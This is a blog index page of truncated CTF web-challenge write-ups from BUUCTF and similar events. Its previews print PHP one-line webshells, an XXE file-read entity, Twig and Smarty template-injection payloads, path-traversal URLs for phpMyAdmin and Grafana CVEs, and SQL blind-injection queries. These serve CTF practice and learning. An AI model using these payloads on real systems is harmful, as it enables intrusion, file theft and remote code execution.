- 博客(47)
- 收藏
- 关注
原创 【BUUCTF】[极客大挑战 2019]RCE ME
源码首先是PHP正则绕过,有长度限制,考虑使用取反绕过首先试试看看phpinfo重点看这个禁用函数,禁用了很多函数下一步试着传木马蚁剑连接一下,显然这里需要但是由于禁用了命令执行的函数,这里要进行绕过网上有两种方法,一种是使用蚁剑的插件,科学上网才能下载得到另一种是通过 & 绕过这里不做详细讲述了,具体可以看看我的个人博客here上传文件后使用PL...
2022-07-09 14:50:44
726
3
原创 【BUUCTF】[Zer0pts2020]Can you guess it?
源码想要读取文件只能从这段入手(不知道另外一处有没有办法),正则表达式是表示不能以config.php为结尾这里学习一个新知识接下来是basename它有个小问题,它会去掉文件名开头的非ASCII值。PL...
2022-06-08 21:21:46
510
原创 【BUUCTF】[SUCTF 2019]Pythonginx
这道题核心就是一个知识点,与编码漏洞idna与utf-8编码漏洞Black-Hat贴一个跑编码对照的脚本这道题很多方式绕过,可以用,刚好可以替代
2022-06-03 22:01:53
371
原创 【BUUCTF】[MRCTF2020]Ezpop
一道pop链的问题,反序列化漏洞进阶思路如下声明一个类,会调用方法我们让也是一个类,则会调用其方法我们接下来让是一个类,其没有属性,则会调用方法我们最后让是类,就会执行方法,同时注意最核心的方法中有函数,可以使用php伪协议读文件pop链构造依次如下最后exp如下最后总结使用到的魔法函数的知识...
2022-06-03 15:19:27
573
原创 【BUUCTF】[网鼎杯 2020 朱雀组]phpweb
BP抓包发现了突破口func=file_get_contents&p=index.php拿到源码 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert",
2022-05-31 17:18:46
210
原创 【BUUCTF】[BSidesCF 2019]Futurella
检查拿到代码<?php#error_reporting(0);class HelloPhp{ public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ $a = $this->a;
2022-05-19 22:14:53
525
1
原创 【BUUCTF】[De1CTF 2019]SSRF Me
源码#! /usr/bin/env python# #encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1') app = Flask(__name__) secert_key = os
2022-05-06 22:05:30
283
原创 【BUUCTF】[CISCN 2019 初赛]Love Math
源码<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '
2022-05-05 18:53:21
482
1
原创 【BUUCTF】[WesternCTF2018]shrine
源码import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')@app.route('/')def index(): return open(__file__).read()@app.route('/shrine/<path:shrine>')def shrine(shrine): def safe_jinja(s):
2022-05-05 17:41:15
667
原创 【BUUCTF】[安洵杯 2019]easy_serialize_php
直接看到源码<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);}if($_SESSION){ unset($_SESSION)
2022-05-03 21:28:19
1329
原创 【BUUCTF】[WUSTCTF2020]朴实无华
为什么打开robots.txt,一是看见源码中有提示,二是应该在没有思路时作为常规操作显示flag也不会在里面打开这个文件,看见源码<img src="/img.jpg"><?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//level 1if (isset($_GET['num'])){ $num = $_GET.
2022-05-01 22:24:47
1668
原创 【BUUCTF】[安洵杯 2019]easy_web
开幕破防属于是。。。观察urlhttp://dc66bac4-e3ff-492e-b89e-6ddf6f65ab2b.node4.buuoj.cn:81/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=img后面的像是一个base64加密后的字符串,cmd参数没有,尝试输入什么每什么反应,那就对这个字符串下手显然还要进行一次一串数字,hex解码是一个图片名,可以推断存在任意文件读取漏洞,我们将index.php进行hex->b.
2022-04-30 17:24:20
1900
原创 【BUUCTF】[NCTF2019]Fake XML cookbook
bp抓包观察,username和password是以xml文件形式post的学习从XML相关一步一步到XXE漏洞用最基本的XXE攻击<?xml version="1.0" encoding="utf-8"?><!DOCTYPE a [<!ENTITY user SYSTEM "file:///flag">]><user><username>&user;</username><password>123&
2022-04-30 16:19:13
337
原创 【BUUCTF】[BJDCTF2020]Cookie is so stable
flag页面比较容易看出来存在SSTI看见有wp说是Twig模板注入,copy一下判断方法尝试{{7*7}}, 返回49尝试{{7*‘7’}},返回49,说明是Twig模板,但是如果返回7777777,则说明是Jinia2模板不同的模板的攻击方式不同,贴一个好文章一篇文章带你理解漏洞之 SSTI 漏洞用PL{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}但是在输入框.
2022-04-30 16:06:16
294
原创 【BUUCTF】[强网杯 2019]高明的黑客
拿到的源码有3000多个文件,所有文件都是杂乱的网上wp感觉对题目的理解部分讲解较少,结合蚁剑工具,我觉得题目意思像是说这里面的文件是一句话木马,我们要找到合适的GET或POST参数能执行shell命令。用脚本暴力跑完所有文件的所有参数,技术不行,只能贴别人的代码import osimport requestsimport reimport threadingimport timeprint('开始时间: '+ time.asctime( time.localtime(time.ti.
2022-04-26 16:53:56
2584
原创 【BUUCTF】[GWCTF 2019]我有一个数据库
还以为是电脑出问题了。。。没啥东西就用dirsearch扫描,扫描出来有PHPmyadmin关于phpmyadmin 4.8.1的漏洞问题,移步这里(CVE-2018-12613)phpmyadmin 4.8.1这道题最终完整payloadphpmyadmin/?target=db_datadict.php%253f/../../../../../../../../flag......
2022-04-24 16:25:43
1117
原创 【BUUCTF】[BSidesCF 2020]Had a bad day
注意到url中的参数category,以为是注入点,实际上输入其他的只会一个错误说明用php伪协议读取文件/index.php?category=php://filter/convert.base64-encode/resource=index解密拿到代码 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || st.
2022-04-24 15:33:17
808
原创 【BUUCTF】[BJDCTF2020]The mystery of ip
X-Forwarded-For看到题目,要首先想到这个BP在http头里面增加X-Forwarded-For,发现是可控的,可能存在模板注入让X-Forwarded-For={{7*7}}接下来常规思路注入命令X-Forwarded-For={{system("cat /flag")}}过程没什么好说的,贴一下源码<?php require_once('header.php'); require_once('./libs/Smarty.class.php'); $
2022-04-23 15:02:39
417
原创 【BUUCTF】[CISCN2019 华东南赛区]Double Secret
尝试/secret?secret=1输入长一点发现出现了报错,这个页面是flask应用开启了debug模式后运行出错的表现,在较老版本的flask中可以直接在这个页面中打开python控制台运行代码,而在较新版本的flask中要打开python控制台需要输入一个pin码仔细观察报错,不难发现一处引人注目,单独拎出来审计代码 if(secret==None): return 'Tell me your secret.I will encrypt it so others ca.
2022-04-22 23:26:40
1957
2
原创 【BUUCTF】[RoarCTF 2019]Easy Java
点击help,发现拿不到help.docx根据wp,这里使用hackbar发post才能拿到文件java web 文件格式src/main/java: 这个目录一般是存放web项目的Java源文件的src/main/resource: 这个目录一般是存放相关的配置文件src/main/webapp: 这个目录一般是和web应用相关的webapp下的文件目录是容易出现安全问题的/WEB-INF/web.xml: Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则.
2022-04-17 16:42:14
939
原创 【*CTF】 oh-my-grafana
Grafana任意文件读取漏洞(CVE-2021-43798)有空另一个blog里复现一波,这里直接写wp/public/plugins/alertlist/…/…/…/…/…/…/…/…/…/…/…/etc/grafana/grafana.ini 查看配置文件在配置文件里面可以找到admin的默认密码成功登录进去后,尝试根据配置文件中的数据库信息登录数据库然后在explore中可以得到flag...
2022-04-17 15:53:23
1874
原创 【BUUCTF】[BJDCTF2020]ZJCTF,不过如此
看看源码<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg
2022-04-14 15:41:47
1289
原创 【BUUCTF】[GXYCTF2019]禁止套娃
dirsearch扫描目录发现存在git泄露于是用GitHack 生成index.php<?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\
2022-04-13 21:01:27
865
原创 【BUUCTF】[CISCN2019 华北赛区 Day2 Web1]Hack World
明确告诉了flag的位置输入1输入其他的基本上都没有错误回显或者信息,采用bool盲注fuzz一波发现select没有过滤,空格过滤了1^(ascii(substr((select(flag)from(flag)),1,1))>127)正常回显,说明方法可行脚本跑出每一个字符即可import requestsimport timeurl='http://10cb7823-c884-4555-80b8-f586b15e6057.node4.buuoj.cn:81/index..
2022-04-11 17:37:54
814
3
原创 【BUUCTF】[网鼎杯 2018]Fakebook
随便注册一个账户后,点击进去url中的no引人注意,尝试no=0出现了很多信息,感觉像是sql注入,于是no=1’试试好,这里存在注入漏洞,一套连招下来,发现union被过滤,select存活,但是据说可以用/**/绕过,反正是没怎么过滤,想怎么来怎么来不想写中间过程了,轻松爆出了数据库名、表名,看看最后几步?no=1 and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.co
2022-04-09 14:50:38
758
原创 【BUUCTF】[SUCTF 2019]CheckIn
废话不多讲,老生常谈的文件上传题目需要传一个图片马GIF89a<script language='php'>@eval($_POST['abc']);</script>还有一个.user.ini文件文件上传之.user.iniGIF89aauto_prepend_file=upload.jpg作用是指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。蚁剑链接http://c8a6d5ca-0f52-4c27-a06f-
2022-04-09 11:35:04
557
原创 【BUUCTF】[ZJCTF 2019]NiZhuanSiWei
源码<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&g
2022-04-08 22:15:12
1036
原创 【BUUCTF】[网鼎杯 2020 青龙组]AreUSerialz
不带演的,直接给出了源代码<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $
2022-04-07 16:48:36
348
原创 【BUUCTF】[极客大挑战 2019]PHP
打开网站提示说有备份文件dirsearch扫描下载www.zip查看重要文件class.php<?phpinclude 'flag.php';error_reporting(0);class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this-&
2022-04-06 21:21:37
977
1
原创 如何用docker搭建N1BOOK题目的环境
文章目录前言配置一台CentOS7安装docker和docker-compose编辑docker-compose.yml前言在做BUU的N1Book题目的时候,遇到一些题目wp是自己搭建靶机,这样能更好的看到靶机实际的变化,能有更深的理解,于是自己索性也想这样尝试,一干就是小半个晚上<_>!!配置一台CentOS7教程照这个教程基本上没有问题安装docker和docker-compose同样的用现有教程教程踩了个雷,可能遇到这样问题解决方法根据提示在命令结尾加上–allo
2022-04-05 23:34:38
2020
1
原创 【BUUCTF】N1BOOK WEB WP
文章目录常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2常见的搜集粗心的小李git泄露,用scrabble工具得到一个网页打开即可SQL注入-1SQL注入-2afr_1afr_2
2022-03-29 17:00:32
2291
原创 【picoCTF 2022 一些题目的wp】
picoCTF 2022 一些题目的wp这里记录一下picoCTF 2022 中做出来的题目文章目录WEB1.Includes2.Inspect HTML3.Local Authority4.Search source5.Forbidden Paths6.Power CookieCrypto1.WEB1.Includes打开开发者工具,在style.css中看见flag2.Inspect HTML查看源代码3.Local Authority密码找到4.Search sourceC
2022-03-27 12:31:41
1790
原创 CTF——MD5总结
文章目录1.MD5简介2.弱类型比较的MD5绕过3.强类型比较的MD5绕过4.MD5构造攻击语句1.MD5简介MD5是一种常见的加密方式,但准确来说,它只是一种编码方式,它将任意有限长度的字符串通过哈希函数转换为特定长度的字符串。MD5编码具有单向性,即由明文变密文简单,由密文变明文困难。破解时只能通过暴力破解即穷举法所以基于这个特性,MD5可以有效保证信息的完整性,当文件进行一点点的修改,MD5值都会有很大的改变。MD5生成的密文由2进制表示——128位构成由16进制表示——32位(大小写
2022-03-15 21:54:41
2914
1
原创 【BUUCTF】[RoarCTF 2019]Easy Calc1
题目网页是一个计算器查看源代码发现线索calc.php直接访问这里对eval对get的内容执行,尝试注入php代码前面也说了waf,我们这里利用php解析字符串的特性来绕过PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1)删除空白符2)将某些字符转换为下划线(包括空格)图片来源博客PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)_bin789456的博客-CS...
2022-03-14 21:59:10
450
原创 【BUUCTF】[极客大挑战 2019]Upload1
试着上传一个一句话木马的.jpg文件<?phpeval($_GET['abc']); ?>看样子是不能用php,必须换一种语言仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗GIF89a图片头文件欺骗上传成功了,接下来我们在BP中上传,截获数据包,并且把...
2022-03-13 00:24:26
1080
1
原创 【BUUCTF】[ACTF2020 新生赛]BackupFile1
突破口在题目标题,BackupFile——备份文件常见的备份文件后缀名有 .git .svn.swp .~ .bak .bash_history这道题目是.bak输入index.php.bak后可以下载得到代码比较简单输入的key必须是数,然后转换为整数和字符串key比较这里涉及php弱类型比较php弱类型比较所以本题目只需要构造payload?key=123...
2022-03-12 22:04:15
3578
原创 【BUUCTF】[极客大挑战 2019]Http1
第一步也是看网上wp才知道是什么。。鼠标光标放在“氛围”上会发现左下角的提示我们使用bp抓包这里告诉我们用Referer头Referer:https://Sycsecret.buuoj.cn修改UAUser-Agent:Syclover使用X-Forwarded-For:127.0.0.1X-Forwarded-For...
2022-03-08 22:08:50
183
原创 【BUUCTF】[HCTF 2018]WarmUp1
一道php代码审计题目打开网页源代码,发现提示访问/source页面想要看到某个文件得通过checkFile函数第一步page要在白名单里面查看hint预备知识mb_substr()strpos字符串拼接用'.'第二步这里的代码含义就是将page后面加上?,然后将第一次出现?前的字符串赋值给_page,然后_page是否在白名单中第三步只比第二步多了一个将url编码,所以对?我们进行双重url编码即可...
2022-03-07 23:02:56
187
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人